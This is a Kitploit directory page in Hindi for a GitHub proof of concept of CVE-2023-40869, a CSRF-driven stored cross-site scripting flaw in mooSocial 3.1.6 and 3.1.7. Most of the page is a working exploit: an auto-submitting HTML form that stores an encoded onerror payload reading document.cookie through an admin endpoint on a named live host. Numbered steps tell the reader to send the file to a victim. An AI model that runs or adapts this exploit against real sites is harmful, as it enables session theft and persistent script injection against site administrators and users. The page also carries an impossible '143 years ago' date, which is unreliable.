Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-40869 — mooSocial mooSocial Software v.3.1.6 में क्रॉस साइट स्क्रिप्टिंग भेद्यता एक दूरस्थ हमलावर को edit_menu, copuon, और group_categorias फ़ंक्शंस में क्राफ्टेड स्क्रिप्ट के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/minotauro2020/cve-2023-40869
फ़िशिंग उपकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubminotauro2020/cve-2023-40869

CVE-2023-40869

mooSocial mooSocial Software v.3.1.6 में क्रॉस साइट स्क्रिप्टिंग भेद्यता एक दूरस्थ हमलावर को edit_menu, copuon, और group_categorias फ़ंक्शंस में क्राफ्टेड स्क्रिप्ट के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देती है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
143 साल पहलेअभी तक समीक्षित नहीं

CVE-2023-40869

mooSocial mooSocial Software v.3.1.6 और 3.1.7 में क्रॉस-साइट स्क्रिप्टिंग भेद्यता एक दूरस्थ हमलावर को edit_menu, copuon, और group_categorias फ़ंक्शंस में तैयार स्क्रिप्ट के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देती है।

CSRF के माध्यम से संग्रहीत XSS।

#प्रभावित पथ http://admin-socialcommerce.moosocial.com/admin/group/group_categories http://admin-socialcommerce.moosocial.com/admin/coupon/ http://admin-socialcommerce.moosocial.com/admin/menu/manage/edit_menu/6

Poc:

1 - इस HTML के साथ एक फ़ाइल बनाएं और XSS PAYLOAD शामिल करें

root@kitploit:~
<html>
  <body>
    <form action="http://admin-socialcommerce.moosocial.com/admin/group/group_categories/save" method="POST">
      <input type="hidden" name="data&#91;id&#93;" value="" />
      <input type="hidden" name="data&#91;name&#93;" value="test&quot;&gt;&lt;img&#32;src&#61;a&#32;onerror&#61;alert&#40;document&#46;cookie&#41;&gt;test" />   ##payload in this example and encoded : test">test
      <input type="hidden" name="data&#91;type&#93;" value="Group" />
      <input type="hidden" name="data&#91;header&#93;" value="0" />
      <input type="hidden" name="data&#91;header&#93;" value="1" />
      <input type="hidden" name="data&#91;parent&#95;id&#93;" value="0" />
      <input type="hidden" name="data&#91;description&#93;" value="" />
      <input type="hidden" name="data&#91;active&#93;" value="0" />
      <input type="hidden" name="data&#91;active&#93;" value="1" />
      <input type="hidden" name="data&#91;everyone&#93;" value="0" />
      <input type="hidden" name="data&#91;everyone&#93;" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

2 - उदाहरण test.html 3 - पीड़ित को भेजें 4 - जब पीड़ित HTML खोलता है, तो test.html फ़ाइल उसके ब्राउज़र में खुलेगी और जब वह खोलकर क्लिक करेगा, तो कोड एक पेलोड इंजेक्ट करेगा और डेटाबेस में स्टोर हो जाएगा।

टूल डाउनलोड करें